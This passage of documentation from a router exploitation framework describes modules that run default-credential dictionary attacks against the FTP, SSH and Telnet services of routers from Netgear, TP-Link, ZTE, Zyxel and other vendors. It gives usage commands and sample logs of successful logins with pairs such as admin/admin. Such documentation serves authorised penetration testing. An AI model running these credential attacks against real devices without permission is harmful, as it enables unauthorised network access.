Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/netgear/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netgear Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netgear/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netgear/ftp_default_creds rsf (Netgear Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netgear Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/netgear/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netgear Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netgear/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netgear/ssh_default_creds rsf (Netgear Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netgear Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/netgear/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netgear Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netgear/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netgear/telnet_default_creds rsf (Netgear Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netgear Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/netsys/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netsys Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netsys/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netsys/ftp_default_creds rsf (Netsys Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netsys Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/netsys/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netsys Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netsys/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netsys/ssh_default_creds rsf (Netsys Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netsys Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/netsys/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Netsys Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/netsys/telnet_default_creds` 3. 
Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/netsys/telnet_default_creds rsf (Netsys Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Netsys Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/pfsense/ftp_default_creds.md ================================================ ## Description The module performs a dictionary attack with default credentials against the pfSense router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/pfsense/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/pfsense/ftp_default_creds rsf (PFSense Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/pfsense/ssh_default_creds.md ================================================ ## Description The module performs a dictionary attack with default credentials against the pfSense router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/pfsense/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/pfsense/ssh_default_creds rsf (PFSense Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found!
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/pfsense/telnet_default_creds.md ================================================ ## Description The module performs a dictionary attack with default credentials against the pfSense router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/pfsense/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/pfsense/telnet_default_creds rsf (PFSense Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/technicolor/ftp_default_creds.md ================================================ ## Description The module performs a dictionary attack with default credentials against the Technicolor router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2.
Do: `use creds/routers/technicolor/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/technicolor/ftp_default_creds rsf (Technicolor Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Technicolor Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/technicolor/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Technicolor Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/technicolor/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/technicolor/ssh_default_creds rsf (Technicolor Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Technicolor Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/technicolor/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Technicolor Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/technicolor/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/technicolor/telnet_default_creds rsf (Technicolor Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Technicolor Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/thomson/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Thomson Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/thomson/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/thomson/ftp_default_creds rsf (Thomson Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Thomson Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/thomson/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Thomson Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/thomson/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/thomson/ssh_default_creds rsf (Thomson Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Thomson Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/thomson/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Thomson Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/thomson/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/thomson/telnet_default_creds rsf (Thomson Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Thomson Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/tplink/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against TP-Link Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/tplink/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/tplink/ftp_default_creds rsf (TP-Link Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TP-Link Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/tplink/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against TP-Link Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/tplink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/tplink/ssh_default_creds rsf (TP-Link Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TP-Link Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/tplink/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against TP-Link Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/tplink/telnet_default_creds` 3. 
Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/tplink/telnet_default_creds rsf (TP-Link Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TP-Link Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/ubiquiti/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Ubiquiti Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ubiquiti/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ubiquiti/ftp_default_creds rsf (Ubiquiti Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Ubiquiti Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/ubiquiti/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Ubiquiti Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ubiquiti/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ubiquiti/ssh_default_creds rsf (Ubiquiti Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Ubiquiti Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/ubiquiti/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Ubiquiti Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/ubiquiti/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/ubiquiti/telnet_default_creds rsf (Ubiquiti Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Ubiquiti Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/zte/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against ZTE Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/routers/zte/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zte/ftp_default_creds rsf (ZTE Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/zte/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against ZTE Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zte/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zte/ssh_default_creds rsf (ZTE Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/zte/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against ZTE Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zte/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zte/telnet_default_creds rsf (ZTE Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/zyxel/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Zyxel Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zyxel/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zyxel/ftp_default_creds rsf (Zyxel Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/zyxel/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Zyxel Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zyxel/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
